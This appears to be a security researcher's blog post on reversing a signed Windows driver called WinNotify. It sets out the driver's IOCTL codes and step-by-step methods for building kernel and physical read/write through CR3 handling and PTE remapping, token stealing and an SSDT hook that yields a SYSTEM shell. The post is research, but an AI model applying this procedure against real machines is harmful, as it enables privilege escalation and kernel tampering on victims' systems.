WinNotify: Building Kernel Read/Write from CR3-Based IOCTLs
Share
In this post I’m going to document some notes from reversing the WinNotify signed driver and turning its IOCTL interface into a stable kernel read/write primitive.
The driver has been discussed publicly before, but I still wanted to go through the binary myself instead of only following the released PoC. That ended up being useful. The public exploit takes the simple route: `0x22200C` for the kernel base, `0x222040` for kernel reads, and `0x222044` for VA writes through the driver's `memmove()` path.
What the original PoC uses:
0x22200C for module/kernel base
0x222040 for the 5-QWORD kernel read helper
0x222044 for the memmove() kernel VA write
Then it walks ActiveProcessLinks, reads the SYSTEM token, and writes it into the current process token.
The part I wanted to look at deeper was the CR3-based path exposed by `0x222000 / 0x222004` mentioned in the article, but not used in their exploit. Those IOCTLs are more interesting for building a reusable memory backend because they accept a virtual address and a supplied DirBase, then rely on the driver's internal page-table walk to reach physical memory.
So this post picks up from that point: instead of stopping at token stealing with `memmove()`, I wanted to use the CR3 path to build a cleaner physical read/write layer.
IOCTL Surface
After looking at the dispatch logic, the useful parts were the CR3-aware read/write path and the module/query helpers.
The exposed read primitive is not a physical address call. The driver takes a virtual address plus a CR3 and internally resolves the translation. That means the caller has to be very clear about which address space is being used.
The basic flow goes as follows:
1. get module base
2. get process CR3
3. use CR3-backed virtual read/write
4. build a controlled physical mapping layer
5. use that to implement stable VA reads/writes
There are two different CR3 concepts involved:
scratch CR3 -> address space where the temporary user mapping exists
translation CR3 -> address space being translated for target reads/writes
Resolving Kernel Base
The kernel base is obtained through the driver’s module-list functionality. This is straightforward.
Once ntoskrnl base address is known, symbols or local PE parsing can be used to resolve the offsets needed later. I used NTOSKernelWalkerLib to locate PsInitialSystemProcess, then used the read primitive to validate the rest of the context.
At this point the primitive is still not complete. Having the kernel base only tells us where to start.
The CR3 Bootstrap
The driver exposes logic to obtain a CR3 for a process. For this flow, the first CR3 I obtained was the current process CR3. That CR3 is saved as the initial CR3 and later when SYSTEM DTB (DirBase) is discovered, that value is used for translation, but it not replacing the initial CR3.
The model is:
current process CR3 -> used to access the initial VA
target/system CR3 -> used for page-table walking
This distinction is important because the initial virtual address belongs to the current process. If the code later tries to access that same VA through the SYSTEM CR3, the mapping is not guaranteed.
Next, PTE (Page Table Entry) Base
To build a physical read/write layer, I needed to temporarily remap an initial page to a chosen physical frame. For that, the backend needs the PTE address for a virtual address.
The relevant kernel flow follows this logic:
pte = pte_base + ((va >> 9) & mask)
PTE base is not hardcoded. It is resolved from the live kernel during runtime.
Then scanning the live MiGetPteAddress and extracts the immediate values used by the running kernel. Once resolved, the backend would have this values:
PTE base
PTE mask
scratch VA
scratch PTE VA
original scratch PTE
With those, it can patch the initial page PTE, use it as a temporary physical window, and restore it immediately after the operation.
Physical Read
Here is where the fun beings, the physical read flow is as follows:
1. Split the requested physical range by page
2. Save the current initial PTE
3. Replace the PFN in the initial PTE
4. Read from initial_va + page_offset using the initial CR3
5. Restore the original initial PTE
6. Continue with the next page
The initial page is only a window. It is not left mapped to arbitrary physical memory.
This is the part that made the primitive much more useful. The driver does not need to expose a clean raw physical read IOCTL. The backend can build one from the available CR3-backed access plus temporary PTE remapping, yes this was exposed by the driver!
Physical Write
Write follows the same idea:
1. Patch initial PTE to point at the target PFN
2. Write through the initial VA
3. Restore the original PTE
The restore step is not optional or it will bugcheck.
If the process keeps a user VA mapped to some arbitrary physical page, later user-mode access can become unpredictable/unstable. It also makes debugging impossible because the crash may happen much later than the bad remap.
Virtual Read/Write
Once physical read/write works, virtual read/write becomes a page-table walker.
The backend walks:
PML4
PDPT
PD
PT
using the selected translation CR3.
For each VA, it resolves the final physical address, then uses the physical remapper to move the bytes.
This also handles page boundaries cleanly. Large reads are split so that each translated chunk stays inside the current page.
And all together looks like this:
1. open driver
2. resolve ntoskrnl base
3. bootstrap current process CR3
4. save it as initial_cr3
5. resolve live PTE base/mask
6. allocate scratch page
7. resolve scratch PTE
8. save original scratch PTE
9. use initial page as temporary physical window
10 walk page tables with translation_cr3
11. expose stable kernel VA read/write
Most of the time spent here was not about finding the IOCTLs as the article was quite clear on their research and I also did a vulnerability check using Driver Buddy Revolutions in Ghidra. It was about making the IOCTLs behave like PA RW + Translation
In this case, once the CR3 split and PTE remap flow were cleaned up, the backend became much more predictable and stable.
Hope you enjoyed this read, it was quite fun to make this one work as PA RW.
The following screenshot shows this exploit (PA RW) being used as a backend for DOG while doing a ssdt hook (code execution) to obtain a NT/System shell via token swap.
